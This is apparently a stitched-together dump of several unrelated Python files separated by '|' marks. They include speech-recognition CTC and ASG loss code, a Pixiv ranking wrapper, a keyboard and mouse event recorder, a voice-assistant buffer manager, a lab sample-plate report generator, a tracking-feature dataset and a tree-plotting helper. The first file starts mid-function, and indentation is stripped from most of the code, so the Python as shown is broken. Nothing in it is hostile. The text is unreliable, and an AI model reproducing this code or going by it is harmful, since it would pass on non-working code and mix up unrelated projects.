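    config = module_from_file("my_experiment_config", "configs/my_experiment.py")
    # Attributes of the loaded file are then available as usual, e.g.
    # config.some_setting.
    return config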
class Subset(torch.utils.data.Subset):
def __init__(self, dataset, indices):
super(Subset, self).__init__(dataset, indices)
def sample_sizes(self):
"""
        Yields tuples containing the input size
(width, height) and the output length for each sample.
"""
sizes = list(self.dataset.sample_sizes())
for idx in self.indices:
yield sizes[idx]
class BatchSortedSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size, world_rank, world_size, shuffle=True):
local_batchsize = batch_size // world_size
widths = (in_size[0] for in_size, _ in dataset.sample_sizes())
sorted_dataset = sorted(enumerate(widths), key=lambda x: x[1])
sorted_indices, _ = zip(*sorted_dataset)
global_batches = [
sorted_indices[idx : idx + local_batchsize]
for idx in range(0, len(sorted_indices), local_batchsize)
]
self.length = len(global_batches) // world_size
# distribute the sample across the ranks
self.batches = [
global_batches[world_rank + i * world_size] for i in range(self.length)
]
self.shuffle = shuffle
def __iter__(self):
order = torch.randperm if self.shuffle else torch.arange
return (self.batches[i] for i in order(self.length))
def __len__(self):
return self.length
def padding_collate(samples):
inputs, targets = zip(*samples)
# collate inputs:
h = inputs[0].shape[1]
max_input_len = max(ip.shape[2] for ip in inputs)
    batch_inputs = torch.zeros((len(inputs), h, max_input_len))
for e, ip in enumerate(inputs):
batch_inputs[e, :, : ip.shape[2]] = ip
return batch_inputs, targets
@dataclass
class Meters:
loss = 0.0
num_samples = 0
num_tokens = 0
edit_distance_tokens = 0
num_words = 0
edit_distance_words = 0
def sync(self):
lst = [self.loss, self.num_samples, self.num_tokens, self.edit_distance_tokens, self.num_words, self.edit_distance_words]
# TODO: avoid this so that distributed cpu training also works
lst_tensor = torch.FloatTensor(lst).cuda()
torch.distributed.all_reduce(lst_tensor)
(
self.loss,
self.num_samples,
self.num_tokens,
self.edit_distance_tokens,
self.num_words,
self.edit_distance_words
) = lst_tensor.tolist()
@property
def avg_loss(self):
return self.loss / self.num_samples if self.num_samples > 0 else 0
@property
def cer(self):
return self.edit_distance_tokens * 100.0 / self.num_tokens if self.num_tokens > 0 else 0
@property
def wer(self):
return self.edit_distance_words * 100.0 / self.num_words if self.num_words > 0 else 0
# A simple timer class inspired from `tnt.TimeMeter`
class CudaTimer:
def __init__(self, keys):
self.keys = keys
self.reset()
def start(self, key):
s = torch.cuda.Event(enable_timing=True)
s.record()
self.start_events[key].append(s)
return self
def stop(self, key):
e = torch.cuda.Event(enable_timing=True)
e.record()
self.end_events[key].append(e)
return self
def reset(self):
self.start_events = collections.defaultdict(list)
self.end_events = collections.defaultdict(list)
self.running_times = collections.defaultdict(float)
self.n = collections.defaultdict(int)
return self
def value(self):
self._synchronize()
return {k: self.running_times[k] / self.n[k] for k in self.keys}
def _synchronize(self):
torch.cuda.synchronize()
for k in self.keys:
starts = self.start_events[k]
ends = self.end_events[k]
if len(starts) == 0:
raise ValueError("Trying to divide by zero in TimeMeter")
if len(ends) != len(starts):
raise ValueError("Call stop before checking value!")
time = 0
for start, end in zip(starts, ends):
time += start.elapsed_time(end)
self.running_times[k] += time * 1e-3
self.n[k] += len(starts)
self.start_events = collections.defaultdict(list)
self.end_events = collections.defaultdict(list)
def pack_replabels(tokens, num_replabels):
if all(isinstance(t, list) for t in tokens):
return [pack_replabels(t, num_replabels) for t in tokens]
assert isinstance(tokens, list)
new_tokens = []
L = len(tokens)
num = 0
prev_token = -1
for token in tokens:
if token == prev_token and num < num_replabels:
num += 1
else:
if num > 0:
new_tokens.append(num - 1)
num = 0
new_tokens.append(token + num_replabels)
prev_token = token
if num > 0:
new_tokens.append(num - 1)
return new_tokens
def unpack_replabels(tokens, num_replabels):
if all(isinstance(t, list) for t in tokens):
return [unpack_replabels(t, num_replabels) for t in tokens]
assert isinstance(tokens, list)
new_tokens = []
prev_token = -1
for token in tokens:
if token >= num_replabels:
new_tokens.append(token - num_replabels)
prev_token = token
elif prev_token != -1:
for i in range(token + 1):
new_tokens.append(prev_token - num_replabels)
prev_token = -1
return new_tokens
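# Round-trip sketch (added for illustration): with 2 replabels, a run of three
# identical tokens is packed as the shifted token plus a repeat symbol, and
# unpacking restores the original sequence.
def _demo_replabels() -> None:
    tokens = [1, 1, 1, 2]
    packed = pack_replabels(tokens, 2)
    assert packed == [3, 1, 4]  # token + 2, then "1" meaning two extra repeats
    assert unpack_replabels(packed, 2) == tokens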
# Used to measure the time taken for multiple events
class Timer:
def __init__(self, keys):
self.keys = keys
self.n = {}
self.running_time = {}
self.total_time = {}
self.reset()
def start(self, key):
self.running_time[key] = time.time()
return self
def stop(self, key):
self.total_time[key] = time.time() - self.running_time[key]
self.n[key] += 1
self.running_time[key] = None
return self
def reset(self):
for k in self.keys:
self.total_time[k] = 0
self.running_time[k] = None
self.n[k] = 0
return self
def value(self):
vals = {}
for k in self.keys:
if self.n[k] == 0:
raise ValueError("Trying to divide by zero in TimeMeter")
else:
vals[k] = self.total_time[k] / self.n[k]
return vals
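# Minimal usage sketch (added for illustration): time a named section and read
# back the average duration per call in seconds.
def _demo_timer() -> None:
    timer = Timer(["step"])
    timer.start("step")
    time.sleep(0.01)
    timer.stop("step")
    print(timer.value())  # e.g. {'step': ~0.01}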
class CTCLossFunction(torch.autograd.Function):
@staticmethod
def create_ctc_graph(target, blank_idx):
g_criterion = gtn.Graph(False)
L = len(target)
S = 2 * L + 1
for l in range(S):
idx = (l - 1) // 2
g_criterion.add_node(l == 0, l == S - 1 or l == S - 2)
label = target[idx] if l % 2 else blank_idx
g_criterion.add_arc(l, l, label)
if l > 0:
g_criterion.add_arc(l - 1, l, label)
if l % 2 and l > 1 and label != target[idx - 1]:
g_criterion.add_arc(l - 2, l, label)
g_criterion.arc_sort(False)
return g_criterion
@staticmethod
def forward(ctx, log_probs, targets, blank_idx=0, reduction="none"):
B, T, C = log_probs.shape
losses = [None] * B
scales = [None] * B
emissions_graphs = [None] * B
def process(b):
# create emission graph
g_emissions = gtn.linear_graph(T, C, log_probs.requires_grad)
cpu_data = log_probs[b].cpu().contiguous()
g_emissions.set_weights(cpu_data.data_ptr())
# create criterion graph
g_criterion = CTCLossFunction.create_ctc_graph(targets[b], blank_idx)
# compose the graphs
g_loss = gtn.negate(
gtn.forward_score(gtn.intersect(g_emissions, g_criterion))
)
scale = 1.0
if reduction == "mean":
L = len(targets[b])
scale = 1.0 / L if L > 0 else scale
elif reduction != "none":
raise ValueError("invalid value for reduction '" + str(reduction) + "'")
# Save for backward:
losses[b] = g_loss
scales[b] = scale
emissions_graphs[b] = g_emissions
gtn.parallel_for(process, range(B))
ctx.auxiliary_data = (losses, scales, emissions_graphs, log_probs.shape)
loss = torch.tensor([losses[b].item() * scales[b] for b in range(B)])
return torch.mean(loss.cuda() if log_probs.is_cuda else loss)
@staticmethod
def backward(ctx, grad_output):
losses, scales, emissions_graphs, in_shape = ctx.auxiliary_data
B, T, C = in_shape
input_grad = torch.empty((B, T, C))
def process(b):
gtn.backward(losses[b], False)
emissions = emissions_graphs[b]
grad = emissions.grad().weights_to_numpy()
input_grad[b] = torch.from_numpy(grad).view(1, T, C) * scales[b]
gtn.parallel_for(process, range(B))
if grad_output.is_cuda:
input_grad = input_grad.cuda()
input_grad *= grad_output / B
return (
input_grad,
None, # targets
None, # blank_idx
None, # reduction
)
CTCLoss = CTCLossFunction.apply
class ASGLossFunction(torch.autograd.Function):
@staticmethod
def create_transitions_graph(transitions, calc_grad=False):
num_classes = transitions.shape[1]
assert transitions.shape == (num_classes + 1, num_classes)
g_transitions = gtn.Graph(calc_grad)
g_transitions.add_node(True)
for i in range(1, num_classes + 1):
g_transitions.add_node(False, True)
g_transitions.add_arc(0, i, i - 1) # p(i | <s>)
for i in range(num_classes):
for j in range(num_classes):
g_transitions.add_arc(j + 1, i + 1, i) # p(i | j)
cpu_data = transitions.cpu().contiguous()
g_transitions.set_weights(cpu_data.data_ptr())
g_transitions.mark_arc_sorted(False)
g_transitions.mark_arc_sorted(True)
return g_transitions
@staticmethod
def create_force_align_graph(target):
g_fal = gtn.Graph(False)
L = len(target)
g_fal.add_node(True)
for l in range(1, L + 1):
g_fal.add_node(False, l == L)
g_fal.add_arc(l - 1, l, target[l - 1])
g_fal.add_arc(l, l, target[l - 1])
g_fal.arc_sort(True)
return g_fal
@staticmethod
def forward(ctx, inputs, transitions, targets, reduction="none"):
B, T, C = inputs.shape
losses = [None] * B
scales = [None] * B
emissions_graphs = [None] * B
transitions_graphs = [None] * B
calc_trans_grad = transitions.requires_grad
transitions = transitions.cpu() # avoid multiple cuda -> cpu copies
def process(b):
# create emission graph
g_emissions = gtn.linear_graph(T, C, inputs.requires_grad)
cpu_data = inputs[b].cpu().contiguous()
g_emissions.set_weights(cpu_data.data_ptr())
# create transition graph
g_transitions = ASGLossFunction.create_transitions_graph(
transitions, calc_trans_grad
)
# create force align criterion graph
g_fal = ASGLossFunction.create_force_align_graph(targets[b])
# compose the graphs
g_fal_fwd = gtn.forward_score(
gtn.intersect(gtn.intersect(g_fal, g_transitions), g_emissions)
)
g_fcc_fwd = gtn.forward_score(gtn.intersect(g_emissions, g_transitions))
g_loss = gtn.subtract(g_fcc_fwd, g_fal_fwd)
scale = 1.0
if reduction == "mean":
L = len(targets[b])
scale = 1.0 / L if L > 0 else scale
elif reduction != "none":
raise ValueError("invalid value for reduction '" + str(reduction) + "'")
# Save for backward:
losses[b] = g_loss
scales[b] = scale
emissions_graphs[b] = g_emissions
transitions_graphs[b] = g_transitions
gtn.parallel_for(process, range(B))
ctx.auxiliary_data = (
losses,
scales,
emissions_graphs,
transitions_graphs,
inputs.shape,
)
loss = torch.tensor([losses[b].item() * scales[b] for b in range(B)])
return torch.mean(loss.cuda() if inputs.is_cuda else loss)
@staticmethod
def backward(ctx, grad_output):
(
losses,
scales,
emissions_graphs,
transitions_graphs,
in_shape,
) = ctx.auxiliary_data
B, T, C = in_shape
input_grad = transitions_grad = None
if ctx.needs_input_grad[0]:
input_grad = torch.empty((B, T, C))
if ctx.needs_input_grad[1]:
transitions_grad = torch.empty((B, C + 1, C))
def process(b):
gtn.backward(losses[b], False)
emissions = emissions_graphs[b]
transitions = transitions_graphs[b]
if input_grad is not None:
grad = emissions.grad().weights_to_numpy()
input_grad[b] = torch.from_numpy(grad).view(1, T, C) * scales[b]
if transitions_grad is not None:
grad = transitions.grad().weights_to_numpy()
transitions_grad[b] = (
torch.from_numpy(grad).view(1, C + 1, C) * scales[b]
)
gtn.parallel_for(process, range(B))
if input_grad is not None:
if grad_output.is_cuda:
input_grad = input_grad.cuda()
input_grad *= grad_output / B
if transitions_grad is not None:
if grad_output.is_cuda:
transitions_grad = transitions_grad.cuda()
transitions_grad = torch.mean(transitions_grad, 0) * grad_output
return (
input_grad,
transitions_grad,
None, # target
None, # reduction
)
ASGLoss = ASGLossFunction.apply
|
from pypixiv.ranking.body import ContentBody
from typing import Any
from pypixiv.abc import BaseRanking
class RankingInfo(BaseRanking):
def __init__(self, response: Any):
super().__init__(response)
@property
def contents(self) -> list[ContentBody]:
return [ContentBody(content) for content in super().contents]
|
import time
from pynput import keyboard
class StopException(Exception):
pass
class Callbacks:
"""
    Different listening back-ends share the same set of callback functions.
"""
scripts = []
current_time = int(time.time())
@classmethod
def on_mouse_move(cls, x, y):
print(x, y)
@classmethod
def on_mouse_click(cls, x, y, button, pressed):
cls.scripts.append(' '.join(['MOUSE_MOVE', cls.get_and_update_time(), str(x), str(y)]))
if pressed:
cls.scripts.append(' '.join(['MOUSE_PRESS', '0', button.name]))
else:
cls.scripts.append(' '.join(['MOUSE_RELEASE', cls.get_and_update_time(), button.name]))
@classmethod
def on_mouse_scroll(cls, x, y, dx, dy):
cls.scripts.append(' '.join(['MOUSE_SCROLL', cls.get_and_update_time(), str(x), str(y), str(dx), str(dy)]))
@classmethod
def on_key_press(cls, key):
if key == keyboard.Key.esc:
raise StopException('stop by esc')
if '_name_' in key.__dict__:
char = key._name_
elif 'char' in key.__dict__:
char = key.char
else:
char = None
cls.scripts.append(' '.join(['KEY_PRESS', cls.get_and_update_time(), 'None' if char is None else char]))
@classmethod
def on_key_release(cls, key):
if '_name_' in key.__dict__:
char = key._name_
elif 'char' in key.__dict__:
char = key.char
else:
char = 'None'
cls.scripts.append(' '.join(['KEY_RELEASE', cls.get_and_update_time(), 'None' if char is None else char]))
@classmethod
def get_and_update_time(cls):
difference = int(time.time()) - cls.current_time
cls.current_time = int(time.time())
return str(difference)
@classmethod
def get_scripts(cls):
return cls.scripts |
import logging
from kalliope.core.Lifo.LIFOBuffer import LIFOBuffer
from six import with_metaclass
from kalliope.core.Models import Singleton
logging.basicConfig()
logger = logging.getLogger("kalliope")
class LifoManager(with_metaclass(Singleton, object)):
lifo_buffer = LIFOBuffer()
@classmethod
def get_singleton_lifo(cls):
return cls.lifo_buffer
@classmethod
def get_new_lifo(cls):
"""
This class is used to manage hooks "on_start_speaking" and "on_stop_speaking".
:return:
"""
return LIFOBuffer()
@classmethod
def clean_saved_lifo(cls):
cls.lifo_buffer = LIFOBuffer()
|
"""Print project status report."""
from datetime import datetime
import pandas as pd
from jinja2 import Environment, FileSystemLoader
import lib.db as db
import lib.util as util
def generate_reports():
"""Generate all of the reports."""
cxn = db.connect()
now = datetime.now()
sample_wells = get_wells(cxn)
plates = get_plates(sample_wells)
genera = get_genus_coverage(cxn)
# generate_html_report(now, sample_wells, plates, genera)
generate_excel_report(cxn, sample_wells, plates, genera)
def get_wells(cxn):
"""Get well data from the database."""
sql = """
select rt.sample_id,
sci_name, family,
qc.concentration, qc.total_dna,
rt.volume, rt.rapid_source, rt.rapid_dest, rt.source_plate,
rt.sample_id is not null as seq_returned,
la.loci_assembled,
sw.plate_id, sw.entry_date, sw.local_id, sw.local_no,
sw.rapid_plates, sw.notes, sw.results, sw.row, sw.col,
sw.well, sw.well_no
from reformatting_templates as rt
left join qc_normal_plate_layout as qc using (rapid_source)
left join taxonomy_ids as ti using (sample_id)
left join taxonomy as tx using (sci_name)
left join loci_assembled as la using (rapid_dest)
left join sample_wells as sw using (plate_id, well);
"""
sample_wells = pd.read_sql(sql, cxn)
return sample_wells
def get_plates(sample_wells):
"""Get a list of plates."""
columns = ['local_no', 'plate_id', 'entry_date',
'local_id', 'rapid_plates', 'notes']
plates = sample_wells.loc[:, columns]
plates = plates.drop_duplicates()
plates = plates.set_index('local_no')
return plates
def get_plate_wells(sample_wells):
"""Assign wells to their plate."""
plate_wells = {}
for _, plate in sample_wells.groupby('local_no'):
plate_id = plate['plate_id'].iloc[0]
plate_wells[plate_id] = plate.fillna('').to_dict(orient='records')
return plate_wells
def get_genus_coverage(cxn):
"""Get family and genus coverage."""
sql = """
WITH in_images AS (
SELECT sci_name
FROM taxonomy
WHERE sample_id_1 IN (SELECT sample_id FROM images)
OR sample_id_2 IN (SELECT sample_id FROM images)
OR sample_id_3 IN (SELECT sample_id FROM images)
OR sample_id_4 IN (SELECT sample_id FROM images)
OR sample_id_5 IN (SELECT sample_id FROM images))
SELECT family, genus, sci_name AS total, 1 AS imaged
FROM taxonomy
WHERE sci_name IN (SELECT sci_name FROM in_images)
UNION ALL
SELECT family, genus, sci_name AS total, 0 AS imaged
FROM taxonomy
WHERE sci_name NOT IN (SELECT sci_name FROM in_images);
"""
taxonomy = pd.read_sql(sql, cxn)
genera = taxonomy.groupby(['family', 'genus']).agg({
'total': 'count', 'imaged': 'sum'})
taxonomy['genus'] = ''
families = taxonomy.groupby(['family', 'genus']).agg({
'total': 'count', 'imaged': 'sum'})
taxonomy['family'] = '~Total~'
total = taxonomy.groupby(['family', 'genus']).agg({
'total': 'count', 'imaged': 'sum'})
coverage = pd.concat([families, genera, total])
coverage['family'] = coverage.index.get_level_values('family')
coverage['genus'] = coverage.index.get_level_values('genus')
coverage['percent'] = coverage['imaged'] / coverage['total'] * 100.0
return coverage.sort_index()
def generate_html_report(now, sample_wells, plates, genera):
"""Generate the HTML version of the report."""
template_dir = util.get_reports_dir()
env = Environment(loader=FileSystemLoader(template_dir))
template = env.get_template('sample_plates_report.html')
report = template.render(
now=now,
wells=get_plate_wells(sample_wells),
plates=plates.to_dict(orient='records'),
genera=genera.to_dict(orient='records'))
report_path = util.get_output_dir() / 'sample_plates_report.html'
with report_path.open('w') as out_file:
out_file.write(report)
def generate_excel_report(cxn, sample_wells, plates, genera):
"""Generate the Excel version of the report."""
genera = genera.drop(['family', 'genus'], axis=1)
sample_wells = sample_wells.drop(
['entry_date', 'local_id', 'rapid_plates', 'notes', 'plate_id',
'row', 'col', 'results', 'volume'], axis=1)
sample_wells = sample_wells.reindex(
"""local_no well_no well family sci_name sample_id rapid_source
rapid_dest concentration total_dna loci_assembled
""".split(), axis=1)
nfn_data = pd.read_sql('SELECT * FROM nfn_data;', cxn)
sample_wells = sample_wells.merge(
right=nfn_data, how='left', on='sample_id')
sample_wells = sample_wells.drop(['subject_id'], axis=1)
sample_wells = sample_wells.sort_values(['local_no', 'well'])
renames = {
'local_no': 'Local Plate Number',
'well_no': 'Well Offset',
'well': 'Well',
'family': 'Family',
'sci_name': 'Scientific Name',
'sample_id': 'Sample ID',
'concentration': 'Concentration (ng / uL)',
'total_dna': 'Total DNA (ng)',
'country': 'Country',
'state_province': 'State/Province',
'county': 'County',
'location': 'Location',
'minimum_elevation': 'Minimum Elevation',
'maximum_elevation': 'Maximum Elevation',
'main_dropdown': 'Main Dropdown',
'latitude_deg': 'Latitude ⁰',
'latitude_min': "Latitude '",
'latitude_sec': 'Latitude "',
'longitude_deg': 'Longitude ⁰',
'longitude_min': "Longitude '",
'longitude_sec': 'Longitude "',
'primary_collector_last_first_middle':
'Primary Collector (*Last* *First* *Middle*)',
'other_collectors_as_written': 'Other Collectors (as written)',
'collector_number_numeric_only': 'Collector Number (numeric only)',
'collector_number_verbatim': 'Collector Number (verbatim)',
'month_1': 'Month #1',
'day_1': 'Day #1',
'year_1': 'Year #1',
'month_2': 'Month #2',
'day_2': 'Day #2',
'year_2': 'Year #2',
'subject_image_name': 'Image Name',
'subject_nybg_bar_code': 'Bar Code',
'subject_resolved_name': 'Resolved Name',
'workflow_id': 'Workflow ID',
'habitat_description': 'Habitat Description',
'subject_provider_id': 'Provider ID',
'collected_by_first_collector_last_name_only':
'Primary Collector (Last Name Only)',
'collector_number': 'Collector Number',
'collection_no': 'Collection Number',
'seq_returned': 'Sequence Returned?',
'loci_assembled': 'Loci Assembled',
'rapid_source': 'Rapid Source ID',
'rapid_dest': 'Rapid Destination ID',
}
sample_wells = sample_wells.rename(columns=renames)
xlsx_path = util.get_report_data_dir() / 'sample_plates_report.xlsx'
with pd.ExcelWriter(xlsx_path) as writer:
genera.to_excel(writer, sheet_name='Family Coverage')
plates.to_excel(writer, sheet_name='Sample Plates')
sample_wells.to_excel(
writer, sheet_name='Sample Plate Wells', index=False)
if __name__ == '__main__':
generate_reports()
|
import glob
import math
import os
import os.path as osp
import random
import time
from collections import OrderedDict
import json
import cv2
import json
import numpy as np
import torch
from ..models.model import create_model,load_model
import torch.nn.functional as F
import torchvision
class Dataset(): # for training
def __init__(self, config, img_size=(1088, 608)):
# Namespace(K=500, arch='dla_34', batch_size=12, cat_spec_wh=False, chunk_sizes=[6, 6], conf_thres=0.4,
# data_cfg='../src/lib/cfg/data.json', data_dir='/home/hust/yly/Dataset/', dataset='jde',
# debug_dir='/tmp/pycharm_project_382/src/lib/../../exp/mot/default/debug', dense_wh=False,
# det_thres=0.3, down_ratio=4, exp_dir='/tmp/pycharm_project_382/src/lib/../../exp/mot',
# exp_id='default', fix_res=True, gpus=[2, 3], gpus_str='2, 3', head_conv=256,
# heads={'hm': 1, 'wh': 4, 'id': 128, 'reg': 2}, hide_data_time=False, hm_weight=1, id_loss='ce',
# id_weight=1, img_size=(1088, 608), input_h=608, input_res=1088, input_video='../videos/MOT16-03.mp4',
# input_w=1088, keep_res=False, load_model='/home/hust/yly/Model/mix_mot17_half_dla34.pth', lr=0.0001,
# lr_step=[20], ltrb=True, master_batch_size=6, mean=[0.408, 0.447, 0.47], metric='loss',
# min_box_area=100, mse_loss=False, multi_loss='uncertainty', nID=14455, nms_thres=0.4, norm_wh=False,
# not_cuda_benchmark=False, not_prefetch_test=False, not_reg_offset=False, num_classes=1, num_epochs=30,
# num_iters=-1, num_stacks=1, num_workers=8, off_weight=1, output_format='video', output_h=152,
# output_res=272, output_root='../demos', output_w=272, pad=31, print_iter=0, reg_loss='l1',
# reg_offset=True, reid_dim=128, resume=False, root_dir='/tmp/pycharm_project_382/src/lib/../..',
# save_all=False, save_dir='/tmp/pycharm_project_382/src/lib/../../exp/mot/default', seed=317,
# std=[0.289, 0.274, 0.278], task='mot', test=False, test_hie=False, test_mot15=False, test_mot16=False,
# test_mot17=False, test_mot20=False, track_buffer=30, trainval=False, val_hie=False, val_intervals=5,
# val_mot15=False, val_mot16=False, val_mot17='True', val_mot20=False, vis_thresh=0.5, wh_weight=0.1)
self.device = config['device']
self.model = create_model('dla_34', {'hm': 1, 'wh': 4, 'id': 128, 'reg': 2},256)
self.model = load_model(self.model, config['feat_extract_model_path'])
self.model = self.model.to(self.device)
self.model.eval()
self.width = img_size[0]
self.height = img_size[1]
self.sum = []
offset = 0
self.label_files = json.load(open(config['label_pth'],'r'))
for seq in self.label_files.keys():
offset += len(self.label_files[seq])
self.sum.append((offset,seq))
self.nF = offset
self.down_rate = config['down_rate']
self.max_len = config['max_len']
self.dim = 128
self.file = config['file']
self.json = open(self.file,'r')
self.recoder = {}
self.recoder = json.load(self.json)
self.json.close()
self.min_frames = config['min_frames']
self.max_frames = config['max_frames']
def __del__(self):
self.json = open(self.file, 'w')
json.dump(self.recoder,self.json)
print('finish record')
self.json.close()
def __getitem__(self, files_index):
offset = 0
for ind in range(0,len(self.sum)):
if files_index < self.sum[ind][0]:
seq = self.sum[ind][1]
files_index -= offset
break
offset = self.sum[ind][0]
track = self.label_files[seq][str(files_index)]
frames = []
target_feat = torch.zeros(self.max_len,self.dim).to(self.device)
ptrack_feat = torch.zeros(self.max_len, self.dim).to(self.device)
ntrack_feat = torch.zeros(self.max_len, self.dim).to(self.device)
target_mask = torch.zeros(self.max_len).to(self.device)
ptrack_mask = torch.zeros(self.max_len).to(self.device)
ntrack_mask = torch.zeros(self.max_len).to(self.device)
for i in range(len(track)):
if len(track[i]) != 0:
frames.append(track[i])
tstart = random.sample(range(0,len(frames)-2*self.min_frames+1),1)[0]
tend = random.sample(range(tstart+self.min_frames-1,min(len(frames)-self.min_frames,tstart+self.max_frames)),1)[0]
pstart = random.sample(range(tend+1,len(frames)-self.min_frames+1),1)[0]
pend = random.sample(range(pstart+1,min(len(frames),pstart+self.max_frames)),1)[0]
for ind,i in enumerate(range(tstart,tend+1)):
target_feat[ind] = self.get_target_feat(frames[i][0],frames[i][1],files_index)
target_mask[ind] = 1
for ind,i in enumerate(range(pstart,pend+1)):
ptrack_feat[ind] = self.get_target_feat(frames[i][0], frames[i][1],files_index)
ptrack_mask[ind] = 1
idtmp = files_index
while idtmp == files_index:
idtmp = random.sample(range(len(self.label_files[seq])),1)[0]
ntrack = self.label_files[seq][str(idtmp)]
frames = []
for i in range(len(ntrack)):
if len(ntrack[i]) != 0:
frames.append(ntrack[i])
tmp = random.sample(range(len(frames)-self.min_frames+1),1)
for ind,i in enumerate(range(tmp[0], min(len(frames), tmp[0]+random.randint(self.min_frames,self.max_frames)))):
ntrack_feat[ind] = self.get_target_feat(frames[i][0],frames[i][1],idtmp)
ntrack_mask[ind] = 1
return (target_feat,target_mask),(ptrack_feat,ptrack_mask),(ntrack_feat,ntrack_mask)
def __len__(self):
return self.nF
def get_target_feat(self,img_pth,tlbr,id):
id = img_pth + '-'+str(id)
if id in self.recoder.keys():
return torch.from_numpy(np.array(self.recoder[id])).float().to(self.device)
with torch.no_grad():
img = cv2.imread(img_pth)
w = tlbr[2] - tlbr[0]
h = tlbr[3] - tlbr[1]
# tlbr[0] += (random.random() - 0.5) * 0.1 * w
# tlbr[1] += (random.random() - 0.5) * 0.1 * h
# tlbr[2] += (random.random() - 0.5) * 0.1 * w
# tlbr[3] += (random.random() - 0.5) * 0.1 * h
def letterbox(img, height=608, width=1088,
color=(127.5, 127.5, 127.5)): # resize a rectangular image to a padded rectangular
shape = img.shape[:2] # shape = [height, width]
ratio = min(float(height) / shape[0], float(width) / shape[1])
new_shape = (round(shape[1] * ratio), round(shape[0] * ratio)) # new_shape = [width, height]
dw = (width - new_shape[0]) / 2 # width padding
dh = (height - new_shape[1]) / 2 # height padding
top, bottom = round(dh - 0.1), round(dh + 0.1)
left, right = round(dw - 0.1), round(dw + 0.1)
img = cv2.resize(img, new_shape, interpolation=cv2.INTER_AREA) # resized, no border
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT,
value=color) # padded rectangular
return img, ratio, dw, dh
img, r, padw, padh = letterbox(img)
            tlbr = np.array(tlbr).astype(np.float64)
tlbr *= r
tlbr[0] += padw
tlbr[1] += padh
tlbr[2] += padw
tlbr[3] += padh
tlbr = tlbr / self.down_rate
img = img[:, :, ::-1].transpose(2, 0, 1)
img = np.ascontiguousarray(img, dtype=np.float32)
img /= 255.0
img = torch.from_numpy(img).to(self.device).unsqueeze(0)
output = self.model(img)[-1]
id_feature = output['id']
id_feature = F.normalize(id_feature, dim=1)
x = (tlbr[0] + tlbr[2]) /2
y = (tlbr[1] + tlbr[3]) /2
feat = torchvision.ops.roi_align(id_feature,torch.tensor([[0,x,y,x,y]]).float().to(self.device),1).squeeze()
self.recoder[id] = np.array(feat.cpu()).tolist()
return feat
# def get_target_feat(self,img_pth,tlbr,id):
# with torch.no_grad():
# img = cv2.imread(img_pth)
# img = img[:, :, ::-1].transpose(2, 0, 1)
# img = np.ascontiguousarray(img, dtype=np.float32)
# img = torch.from_numpy(img).to(self.device).unsqueeze(0)
# feat = torchvision.ops.roi_align(img,torch.tensor([[0,tlbr[0],tlbr[1],tlbr[2],tlbr[3]]]).float().cuda(),(16,8)).mean(1).reshape(128)
# return feat
|
import math
import random
from collections import namedtuple
import anytree
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import seaborn as sns
from giskard.plot import soft_axis_off
def hierarchy_pos(
G,
root=None,
width=1.0,
vert_gap=0.2,
vert_loc=0,
leaf_vs_root_factor=0.5,
xcenter=0.5,
):
# REF
# https://epidemicsonnetworks.readthedocs.io/en/latest/_modules/EoN/auxiliary.html#hierarchy_pos
"""
If the graph is a tree this will return the positions to plot this in a
hierarchical layout.
Based on Joel's answer at https://stackoverflow.com/a/29597209/2966723,
but with some modifications.
We include this because it may be useful for plotting transmission trees,
and there is currently no networkx equivalent (though it may be coming soon).
There are two basic approaches we think of to allocate the horizontal
location of a node.
- Top down: we allocate horizontal space to a node. Then its ``k``
descendants split up that horizontal space equally. This tends to result
in overlapping nodes when some have many descendants.
- Bottom up: we allocate horizontal space to each leaf node. A node at a
higher level gets the entire space allocated to its descendant leaves.
Based on this, leaf nodes at higher levels get the same space as leaf
nodes very deep in the tree.
    We use both of these approaches simultaneously with ``leaf_vs_root_factor``
determining how much of the horizontal space is based on the bottom up
or top down approaches. ``0`` gives pure bottom up, while 1 gives pure top
down.
:Arguments:
**G** the graph (must be a tree)
**root** the root node of the tree
- if the tree is directed and this is not given, the root will be found and used
- if the tree is directed and this is given, then the positions will be
just for the descendants of this node.
- if the tree is undirected and not given, then a random choice will be used.
**width** horizontal space for this branch - avoids overlap with other branches
**vert_gap** gap between levels of hierarchy
**vert_loc** vertical location of root
**leaf_vs_root_factor**
xcenter: horizontal location of root
"""
if not nx.is_tree(G):
raise TypeError("cannot use hierarchy_pos on a graph that is not a tree")
if root is None:
if isinstance(G, nx.DiGraph):
root = next(
iter(nx.topological_sort(G))
) # allows back compatibility with nx version 1.11
else:
root = random.choice(list(G.nodes))
def _hierarchy_pos(
G,
root,
leftmost,
width,
leafdx=0.2,
vert_gap=0.2,
vert_loc=0,
xcenter=0.5,
rootpos=None,
leafpos=None,
parent=None,
):
"""
see hierarchy_pos docstring for most arguments
pos: a dict saying where all nodes go if they have been assigned
parent: parent of this branch. - only affects it if non-directed
"""
if rootpos is None:
rootpos = {root: (xcenter, vert_loc)}
else:
rootpos[root] = (xcenter, vert_loc)
if leafpos is None:
leafpos = {}
children = list(G.neighbors(root))
leaf_count = 0
if not isinstance(G, nx.DiGraph) and parent is not None:
children.remove(parent)
if len(children) != 0:
rootdx = width / len(children)
nextx = xcenter - width / 2 - rootdx / 2
for child in children:
nextx += rootdx
rootpos, leafpos, newleaves = _hierarchy_pos(
G,
child,
leftmost + leaf_count * leafdx,
width=rootdx,
leafdx=leafdx,
vert_gap=vert_gap,
vert_loc=vert_loc - vert_gap,
xcenter=nextx,
rootpos=rootpos,
leafpos=leafpos,
parent=root,
)
leaf_count += newleaves
leftmostchild = min((x for x, y in [leafpos[child] for child in children]))
rightmostchild = max((x for x, y in [leafpos[child] for child in children]))
leafpos[root] = ((leftmostchild + rightmostchild) / 2, vert_loc)
else:
leaf_count = 1
leafpos[root] = (leftmost, vert_loc)
return rootpos, leafpos, leaf_count
xcenter = width / 2.0
if isinstance(G, nx.DiGraph):
leafcount = len(
[node for node in nx.descendants(G, root) if G.out_degree(node) == 0]
)
elif isinstance(G, nx.Graph):
leafcount = len(
[
node
for node in nx.node_connected_component(G, root)
if G.degree(node) == 1 and node != root
]
)
rootpos, leafpos, leaf_count = _hierarchy_pos(
G,
root,
0,
width,
leafdx=width * 1.0 / leafcount,
vert_gap=vert_gap,
vert_loc=vert_loc,
xcenter=xcenter,
)
pos = {}
for node in rootpos:
pos[node] = (
leaf_vs_root_factor * leafpos[node][0]
+ (1 - leaf_vs_root_factor) * rootpos[node][0],
leafpos[node][1],
)
